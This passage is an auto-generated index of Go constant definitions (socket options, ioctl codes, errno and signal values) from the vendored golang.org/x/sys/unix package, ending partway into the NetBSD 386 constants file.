SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 340) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 341) | SFD_CLOEXEC = 0x400000 constant SFD_NONBLOCK (line 342) | SFD_NONBLOCK = 0x4000 constant SF_FP (line 343) | SF_FP = 0x38 constant SF_I0 (line 344) | SF_I0 = 0x20 constant SF_I1 (line 345) | SF_I1 = 0x24 constant SF_I2 (line 346) | SF_I2 = 0x28 constant SF_I3 (line 347) | SF_I3 = 0x2c constant SF_I4 (line 348) | SF_I4 = 0x30 constant SF_I5 (line 349) | SF_I5 = 0x34 constant SF_L0 (line 350) | SF_L0 = 0x0 constant SF_L1 (line 351) | SF_L1 = 0x4 constant SF_L2 (line 352) | SF_L2 = 0x8 constant SF_L3 (line 353) | SF_L3 = 0xc constant SF_L4 (line 354) | SF_L4 = 0x10 constant SF_L5 (line 355) | SF_L5 = 0x14 constant SF_L6 (line 356) | SF_L6 = 0x18 constant SF_L7 (line 357) | SF_L7 = 0x1c constant SF_PC (line 358) | SF_PC = 0x3c constant SF_RETP (line 359) | SF_RETP = 0x40 constant SF_V9_FP (line 360) | SF_V9_FP = 0x70 constant SF_V9_I0 (line 361) | SF_V9_I0 = 0x40 constant SF_V9_I1 (line 362) | SF_V9_I1 = 0x48 constant SF_V9_I2 (line 363) | SF_V9_I2 = 0x50 constant SF_V9_I3 (line 364) | SF_V9_I3 = 0x58 constant SF_V9_I4 (line 365) | SF_V9_I4 = 0x60 constant SF_V9_I5 (line 366) | SF_V9_I5 = 0x68 constant SF_V9_L0 (line 367) | SF_V9_L0 = 0x0 constant SF_V9_L1 (line 368) | SF_V9_L1 = 0x8 constant SF_V9_L2 (line 369) | SF_V9_L2 = 0x10 constant SF_V9_L3 (line 370) | SF_V9_L3 = 0x18 constant SF_V9_L4 (line 371) | SF_V9_L4 = 0x20 constant SF_V9_L5 (line 372) | SF_V9_L5 = 0x28 constant SF_V9_L6 (line 373) | SF_V9_L6 = 0x30 constant SF_V9_L7 (line 374) | SF_V9_L7 = 0x38 constant SF_V9_PC (line 375) | SF_V9_PC = 0x78 constant SF_V9_RETP (line 376) | SF_V9_RETP = 0x80 constant SF_V9_XARG0 (line 377) | SF_V9_XARG0 = 0x88 constant SF_V9_XARG1 (line 378) | SF_V9_XARG1 = 0x90 constant SF_V9_XARG2 (line 379) | SF_V9_XARG2 = 0x98 constant SF_V9_XARG3 (line 380) | SF_V9_XARG3 = 0xa0 constant SF_V9_XARG4 (line 381) | SF_V9_XARG4 = 0xa8 constant SF_V9_XARG5 (line 382) | SF_V9_XARG5 = 0xb0 constant SF_V9_XXARG (line 383) | SF_V9_XXARG = 0xb8 constant SF_XARG0 (line 384) | SF_XARG0 = 0x44 constant SF_XARG1 (line 385) | SF_XARG1 = 0x48 constant SF_XARG2 (line 386) | SF_XARG2 = 0x4c constant SF_XARG3 (line 387) | SF_XARG3 = 0x50 constant SF_XARG4 (line 388) | SF_XARG4 = 0x54 constant SF_XARG5 (line 389) | SF_XARG5 = 0x58 constant SF_XXARG (line 390) | SF_XXARG = 0x5c constant SIOCATMARK (line 391) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 392) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 393) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 394) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 395) | SIOCINQ = 0x4004667f constant SIOCOUTQ (line 396) | SIOCOUTQ = 0x40047473 constant SIOCSPGRP (line 397) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 398) | SOCK_CLOEXEC = 0x400000 constant SOCK_DGRAM (line 399) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 400) | SOCK_NONBLOCK = 0x4000 constant SOCK_STREAM (line 401) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 402) | SOL_SOCKET = 0xffff constant SO_ACCEPTCONN (line 403) | SO_ACCEPTCONN = 0x8000 constant SO_ATTACH_BPF (line 404) | SO_ATTACH_BPF = 0x34 constant SO_ATTACH_REUSEPORT_CBPF (line 405) | SO_ATTACH_REUSEPORT_CBPF = 0x35 constant SO_ATTACH_REUSEPORT_EBPF (line 406) | SO_ATTACH_REUSEPORT_EBPF = 0x36 constant SO_BINDTODEVICE (line 407) | SO_BINDTODEVICE = 0xd constant SO_BINDTOIFINDEX (line 408) | SO_BINDTOIFINDEX = 0x41 constant SO_BPF_EXTENSIONS (line 409) | SO_BPF_EXTENSIONS = 0x32 constant SO_BROADCAST (line 410) | SO_BROADCAST = 0x20 constant SO_BSDCOMPAT (line 411) | SO_BSDCOMPAT = 0x400 constant SO_BUF_LOCK (line 412) | SO_BUF_LOCK = 0x51 constant SO_BUSY_POLL (line 413) | SO_BUSY_POLL = 0x30 constant SO_BUSY_POLL_BUDGET (line 414) | SO_BUSY_POLL_BUDGET = 0x49 constant SO_CNX_ADVICE (line 415) | SO_CNX_ADVICE = 0x37 constant SO_COOKIE (line 416) | SO_COOKIE = 0x3b constant SO_DETACH_REUSEPORT_BPF (line 417) | SO_DETACH_REUSEPORT_BPF = 0x47 constant SO_DOMAIN (line 418) | SO_DOMAIN = 0x1029 constant SO_DONTROUTE (line 419) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 420) | SO_ERROR = 0x1007 constant SO_INCOMING_CPU (line 421) | SO_INCOMING_CPU = 0x33 constant SO_INCOMING_NAPI_ID (line 422) | SO_INCOMING_NAPI_ID = 0x3a constant SO_KEEPALIVE (line 423) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 424) | SO_LINGER = 0x80 constant SO_LOCK_FILTER (line 425) | SO_LOCK_FILTER = 0x28 constant SO_MARK (line 426) | SO_MARK = 0x22 constant SO_MAX_PACING_RATE (line 427) | SO_MAX_PACING_RATE = 0x31 constant SO_MEMINFO (line 428) | SO_MEMINFO = 0x39 constant SO_NETNS_COOKIE (line 429) | SO_NETNS_COOKIE = 0x50 constant SO_NOFCS (line 430) | SO_NOFCS = 0x27 constant SO_OOBINLINE (line 431) | SO_OOBINLINE = 0x100 constant SO_PASSCRED (line 432) | SO_PASSCRED = 0x2 constant SO_PASSPIDFD (line 433) | SO_PASSPIDFD = 0x55 constant SO_PASSSEC (line 434) | SO_PASSSEC = 0x1f constant SO_PEEK_OFF (line 435) | SO_PEEK_OFF = 0x26 constant SO_PEERCRED (line 436) | SO_PEERCRED = 0x40 constant SO_PEERGROUPS (line 437) | SO_PEERGROUPS = 0x3d constant SO_PEERPIDFD (line 438) | SO_PEERPIDFD = 0x56 constant SO_PEERSEC (line 439) | SO_PEERSEC = 0x1e constant SO_PREFER_BUSY_POLL (line 440) | SO_PREFER_BUSY_POLL = 0x48 constant SO_PROTOCOL (line 441) | SO_PROTOCOL = 0x1028 constant SO_RCVBUF (line 442) | SO_RCVBUF = 0x1002 constant SO_RCVBUFFORCE (line 443) | SO_RCVBUFFORCE = 0x100b constant SO_RCVLOWAT (line 444) | SO_RCVLOWAT = 0x800 constant SO_RCVMARK (line 445) | SO_RCVMARK = 0x54 constant SO_RCVTIMEO (line 446) | SO_RCVTIMEO = 0x2000 constant SO_RCVTIMEO_NEW (line 447) | SO_RCVTIMEO_NEW = 0x44 constant SO_RCVTIMEO_OLD (line 448) | SO_RCVTIMEO_OLD = 0x2000 constant SO_RESERVE_MEM (line 449) | SO_RESERVE_MEM = 0x52 constant SO_REUSEADDR (line 450) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 451) | SO_REUSEPORT = 0x200 constant SO_RXQ_OVFL (line 452) | SO_RXQ_OVFL = 0x24 constant SO_SECURITY_AUTHENTICATION (line 453) | SO_SECURITY_AUTHENTICATION = 0x5001 constant SO_SECURITY_ENCRYPTION_NETWORK (line 454) | SO_SECURITY_ENCRYPTION_NETWORK = 0x5004 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 455) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x5002 constant SO_SELECT_ERR_QUEUE (line 456) | SO_SELECT_ERR_QUEUE = 0x29 constant SO_SNDBUF (line 457) | SO_SNDBUF = 0x1001 constant SO_SNDBUFFORCE (line 458) | SO_SNDBUFFORCE = 0x100a constant SO_SNDLOWAT (line 459) | SO_SNDLOWAT = 0x1000 constant SO_SNDTIMEO (line 460) | SO_SNDTIMEO = 0x4000 constant SO_SNDTIMEO_NEW (line 461) | SO_SNDTIMEO_NEW = 0x45 constant SO_SNDTIMEO_OLD (line 462) | SO_SNDTIMEO_OLD = 0x4000 constant SO_TIMESTAMPING (line 463) | SO_TIMESTAMPING = 0x23 constant SO_TIMESTAMPING_NEW (line 464) | SO_TIMESTAMPING_NEW = 0x43 constant SO_TIMESTAMPING_OLD (line 465) | SO_TIMESTAMPING_OLD = 0x23 constant SO_TIMESTAMPNS (line 466) | SO_TIMESTAMPNS = 0x21 constant SO_TIMESTAMPNS_NEW (line 467) | SO_TIMESTAMPNS_NEW = 0x42 constant SO_TIMESTAMPNS_OLD (line 468) | SO_TIMESTAMPNS_OLD = 0x21 constant SO_TIMESTAMP_NEW (line 469) | SO_TIMESTAMP_NEW = 0x46 constant SO_TXREHASH (line 470) | SO_TXREHASH = 0x53 constant SO_TXTIME (line 471) | SO_TXTIME = 0x3f constant SO_TYPE (line 472) | SO_TYPE = 0x1008 constant SO_WIFI_STATUS (line 473) | SO_WIFI_STATUS = 0x25 constant SO_ZEROCOPY (line 474) | SO_ZEROCOPY = 0x3e constant TAB1 (line 475) | TAB1 = 0x800 constant TAB2 (line 476) | TAB2 = 0x1000 constant TAB3 (line 477) | TAB3 = 0x1800 constant TABDLY (line 478) | TABDLY = 0x1800 constant TCFLSH (line 479) | TCFLSH = 0x20005407 constant TCGETA (line 480) | TCGETA = 0x40125401 constant TCGETS (line 481) | TCGETS = 0x40245408 constant TCGETS2 (line 482) | TCGETS2 = 0x402c540c constant TCSAFLUSH (line 483) | TCSAFLUSH = 0x2 constant TCSBRK (line 484) | TCSBRK = 0x20005405 constant TCSBRKP (line 485) | TCSBRKP = 0x5425 constant TCSETA (line 486) | TCSETA = 0x80125402 constant TCSETAF (line 487) | TCSETAF = 0x80125404 constant TCSETAW (line 488) | TCSETAW = 0x80125403 constant TCSETS (line 489) | TCSETS = 0x80245409 constant TCSETS2 (line 490) | TCSETS2 = 0x802c540d constant TCSETSF (line 491) | TCSETSF = 0x8024540b constant TCSETSF2 (line 492) | TCSETSF2 = 0x802c540f constant TCSETSW (line 493) | TCSETSW = 0x8024540a constant TCSETSW2 (line 494) | TCSETSW2 = 0x802c540e constant TCXONC (line 495) | TCXONC = 0x20005406 constant TFD_CLOEXEC (line 496) | TFD_CLOEXEC = 0x400000 constant TFD_NONBLOCK (line 497) | TFD_NONBLOCK = 0x4000 constant TIOCCBRK (line 498) | TIOCCBRK = 0x2000747a constant TIOCCONS (line 499) | TIOCCONS = 0x20007424 constant TIOCEXCL (line 500) | TIOCEXCL = 0x2000740d constant TIOCGDEV (line 501) | TIOCGDEV = 0x40045432 constant TIOCGETD (line 502) | TIOCGETD = 0x40047400 constant TIOCGEXCL (line 503) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 504) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 505) | TIOCGISO7816 = 0x40285443 constant TIOCGLCKTRMIOS (line 506) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 507) | TIOCGPGRP = 0x40047483 constant TIOCGPKT (line 508) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 509) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 510) | TIOCGPTN = 0x40047486 constant TIOCGPTPEER (line 511) | TIOCGPTPEER = 0x20007489 constant TIOCGRS485 (line 512) | TIOCGRS485 = 0x40205441 constant TIOCGSERIAL (line 513) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 514) | TIOCGSID = 0x40047485 constant TIOCGSOFTCAR (line 515) | TIOCGSOFTCAR = 0x40047464 constant TIOCGWINSZ (line 516) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 517) | TIOCINQ = 0x4004667f constant TIOCLINUX (line 518) | TIOCLINUX = 0x541c constant TIOCMBIC (line 519) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 520) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 521) | TIOCMGET = 0x4004746a constant TIOCMIWAIT (line 522) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 523) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 524) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 525) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 526) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 527) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 528) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 529) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 530) | TIOCM_SR = 0x10 constant TIOCM_ST (line 531) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 532) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 533) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 534) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 535) | TIOCPKT = 0x80047470 constant TIOCSBRK (line 536) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 537) | TIOCSCTTY = 0x20007484 constant TIOCSERCONFIG (line 538) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 539) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 540) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 541) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 542) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 543) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 544) | TIOCSERSWILD = 0x5455 constant TIOCSETD (line 545) | TIOCSETD = 0x80047401 constant TIOCSIG (line 546) | TIOCSIG = 0x80047488 constant TIOCSISO7816 (line 547) | TIOCSISO7816 = 0xc0285444 constant TIOCSLCKTRMIOS (line 548) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 549) | TIOCSPGRP = 0x80047482 constant TIOCSPTLCK (line 550) | TIOCSPTLCK = 0x80047487 constant TIOCSRS485 (line 551) | TIOCSRS485 = 0xc0205442 constant TIOCSSERIAL (line 552) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 553) | TIOCSSOFTCAR = 0x80047465 constant TIOCSTART (line 554) | TIOCSTART = 0x2000746e constant TIOCSTI (line 555) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 556) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 557) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 558) | TIOCVHANGUP = 0x20005437 constant TOSTOP (line 559) | TOSTOP = 0x100 constant TUNATTACHFILTER (line 560) | TUNATTACHFILTER = 0x801054d5 constant TUNDETACHFILTER (line 561) | TUNDETACHFILTER = 0x801054d6 constant TUNGETDEVNETNS (line 562) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 563) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 564) | TUNGETFILTER = 0x401054db constant TUNGETIFF (line 565) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 566) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 567) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 568) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 569) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 570) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 571) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 572) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 573) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 574) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 575) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 576) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 577) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 578) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 579) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 580) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 581) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 582) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 583) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 584) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 585) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 586) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 587) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 588) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 589) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 590) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 591) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 592) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 593) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 594) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 595) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 596) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 597) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 598) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 599) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 600) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 601) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 602) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 603) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 604) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 605) | VDISCARD = 0xd constant VEOF (line 606) | VEOF = 0x4 constant VEOL (line 607) | VEOL = 0xb constant VEOL2 (line 608) | VEOL2 = 0x10 constant VMIN (line 609) | VMIN = 0x6 constant VREPRINT (line 610) | VREPRINT = 0xc constant VSTART (line 611) | VSTART = 0x8 constant VSTOP (line 612) | VSTOP = 0x9 constant VSUSP (line 613) | VSUSP = 0xa constant VSWTC (line 614) | VSWTC = 0x7 constant VT1 (line 615) | VT1 = 0x4000 constant VTDLY (line 616) | VTDLY = 0x4000 constant VTIME (line 617) | VTIME = 0x5 constant VWERASE (line 618) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 619) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 620) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 621) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 622) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 623) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 624) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 625) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 626) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 627) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 628) | WORDSIZE = 0x40 constant XCASE (line 629) | XCASE = 0x4 constant XTABS (line 630) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 631) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 632) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 633) | _HIDIOCGRAWUNIQ = 0x40404808 constant __TIOCFLUSH (line 634) | __TIOCFLUSH = 0x80047410 constant EADDRINUSE (line 639) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 640) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EADV (line 641) | EADV = syscall.Errno(0x53) constant EAFNOSUPPORT (line 642) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EALREADY (line 643) | EALREADY = syscall.Errno(0x25) constant EBADE (line 644) | EBADE = syscall.Errno(0x66) constant EBADFD (line 645) | EBADFD = syscall.Errno(0x5d) constant EBADMSG (line 646) | EBADMSG = syscall.Errno(0x4c) constant EBADR (line 647) | EBADR = syscall.Errno(0x67) constant EBADRQC (line 648) | EBADRQC = syscall.Errno(0x6a) constant EBADSLT (line 649) | EBADSLT = syscall.Errno(0x6b) constant EBFONT (line 650) | EBFONT = syscall.Errno(0x6d) constant ECANCELED (line 651) | ECANCELED = syscall.Errno(0x7f) constant ECHRNG (line 652) | ECHRNG = syscall.Errno(0x5e) constant ECOMM (line 653) | ECOMM = syscall.Errno(0x55) constant ECONNABORTED (line 654) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 655) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 656) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 657) | EDEADLK = syscall.Errno(0x4e) constant EDEADLOCK (line 658) | EDEADLOCK = syscall.Errno(0x6c) constant EDESTADDRREQ (line 659) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOTDOT (line 660) | EDOTDOT = syscall.Errno(0x58) constant EDQUOT (line 661) | EDQUOT = syscall.Errno(0x45) constant EHOSTDOWN (line 662) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 663) | EHOSTUNREACH = syscall.Errno(0x41) constant EHWPOISON (line 664) | EHWPOISON = syscall.Errno(0x87) constant EIDRM (line 665) | EIDRM = syscall.Errno(0x4d) constant EILSEQ (line 666) | EILSEQ = syscall.Errno(0x7a) constant EINPROGRESS (line 667) | EINPROGRESS = syscall.Errno(0x24) constant EISCONN (line 668) | EISCONN = syscall.Errno(0x38) constant EISNAM (line 669) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 670) | EKEYEXPIRED = syscall.Errno(0x81) constant EKEYREJECTED (line 671) | EKEYREJECTED = syscall.Errno(0x83) constant EKEYREVOKED (line 672) | EKEYREVOKED = syscall.Errno(0x82) constant EL2HLT (line 673) | EL2HLT = syscall.Errno(0x65) constant EL2NSYNC (line 674) | EL2NSYNC = syscall.Errno(0x5f) constant EL3HLT (line 675) | EL3HLT = syscall.Errno(0x60) constant EL3RST (line 676) | EL3RST = syscall.Errno(0x61) constant ELIBACC (line 677) | ELIBACC = syscall.Errno(0x72) constant ELIBBAD (line 678) | ELIBBAD = syscall.Errno(0x70) constant ELIBEXEC (line 679) | ELIBEXEC = syscall.Errno(0x6e) constant ELIBMAX (line 680) | ELIBMAX = syscall.Errno(0x7b) constant ELIBSCN (line 681) | ELIBSCN = syscall.Errno(0x7c) constant ELNRNG (line 682) | ELNRNG = syscall.Errno(0x62) constant ELOOP (line 683) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 684) | EMEDIUMTYPE = syscall.Errno(0x7e) constant EMSGSIZE (line 685) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 686) | EMULTIHOP = syscall.Errno(0x57) constant ENAMETOOLONG (line 687) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENAVAIL (line 688) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 689) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 690) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 691) | ENETUNREACH = syscall.Errno(0x33) constant ENOANO (line 692) | ENOANO = syscall.Errno(0x69) constant ENOBUFS (line 693) | ENOBUFS = syscall.Errno(0x37) constant ENOCSI (line 694) | ENOCSI = syscall.Errno(0x64) constant ENODATA (line 695) | ENODATA = syscall.Errno(0x6f) constant ENOKEY (line 696) | ENOKEY = syscall.Errno(0x80) constant ENOLCK (line 697) | ENOLCK = syscall.Errno(0x4f) constant ENOLINK (line 698) | ENOLINK = syscall.Errno(0x52) constant ENOMEDIUM (line 699) | ENOMEDIUM = syscall.Errno(0x7d) constant ENOMSG (line 700) | ENOMSG = syscall.Errno(0x4b) constant ENONET (line 701) | ENONET = syscall.Errno(0x50) constant ENOPKG (line 702) | ENOPKG = syscall.Errno(0x71) constant ENOPROTOOPT (line 703) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSR (line 704) | ENOSR = syscall.Errno(0x4a) constant ENOSTR (line 705) | ENOSTR = syscall.Errno(0x48) constant ENOSYS (line 706) | ENOSYS = syscall.Errno(0x5a) constant ENOTCONN (line 707) | ENOTCONN = syscall.Errno(0x39) constant ENOTEMPTY (line 708) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTNAM (line 709) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 710) | ENOTRECOVERABLE = syscall.Errno(0x85) constant ENOTSOCK (line 711) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 712) | ENOTSUP = syscall.Errno(0x2d) constant ENOTUNIQ (line 713) | ENOTUNIQ = syscall.Errno(0x73) constant EOPNOTSUPP (line 714) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 715) | EOVERFLOW = syscall.Errno(0x5c) constant EOWNERDEAD (line 716) | EOWNERDEAD = syscall.Errno(0x84) constant EPFNOSUPPORT (line 717) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPROCLIM (line 718) | EPROCLIM = syscall.Errno(0x43) constant EPROTO (line 719) | EPROTO = syscall.Errno(0x56) constant EPROTONOSUPPORT (line 720) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 721) | EPROTOTYPE = syscall.Errno(0x29) constant EREMCHG (line 722) | EREMCHG = syscall.Errno(0x59) constant EREMOTE (line 723) | EREMOTE = syscall.Errno(0x47) constant EREMOTEIO (line 724) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 725) | ERESTART = syscall.Errno(0x74) constant ERFKILL (line 726) | ERFKILL = syscall.Errno(0x86) constant ERREMOTE (line 727) | ERREMOTE = syscall.Errno(0x51) constant ESHUTDOWN (line 728) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 729) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESRMNT (line 730) | ESRMNT = syscall.Errno(0x54) constant ESTALE (line 731) | ESTALE = syscall.Errno(0x46) constant ESTRPIPE (line 732) | ESTRPIPE = syscall.Errno(0x5b) constant ETIME (line 733) | ETIME = syscall.Errno(0x49) constant ETIMEDOUT (line 734) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 735) | ETOOMANYREFS = syscall.Errno(0x3b) constant EUCLEAN (line 736) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 737) | EUNATCH = syscall.Errno(0x63) constant EUSERS (line 738) | EUSERS = syscall.Errno(0x44) constant EXFULL (line 739) | EXFULL = syscall.Errno(0x68) constant SIGBUS (line 744) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 745) | SIGCHLD = syscall.Signal(0x14) constant SIGCLD (line 746) | SIGCLD = syscall.Signal(0x14) constant SIGCONT (line 747) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 748) | SIGEMT = syscall.Signal(0x7) constant SIGIO (line 749) | SIGIO = syscall.Signal(0x17) constant SIGLOST (line 750) | SIGLOST = syscall.Signal(0x1d) constant SIGPOLL (line 751) | SIGPOLL = syscall.Signal(0x17) constant SIGPROF (line 752) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 753) | SIGPWR = syscall.Signal(0x1d) constant SIGSTOP (line 754) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 755) | SIGSYS = syscall.Signal(0xc) constant SIGTSTP (line 756) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 757) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 758) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 759) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 760) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 761) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 762) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 763) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 764) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 765) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_netbsd_386.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x1c constant AF_BLUETOOTH (line 16) | AF_BLUETOOTH = 0x1f constant AF_CCITT (line 17) | AF_CCITT = 0xa constant AF_CHAOS (line 18) | AF_CHAOS = 0x5 constant AF_CNT (line 19) | AF_CNT = 0x15 constant AF_COIP (line 20) | AF_COIP = 0x14 constant AF_DATAKIT (line 21) | AF_DATAKIT = 0x9 constant AF_DECnet (line 22) | AF_DECnet = 0xc constant AF_DLI (line 23) | AF_DLI = 0xd constant AF_E164 (line 24) | AF_E164 = 0x1a constant 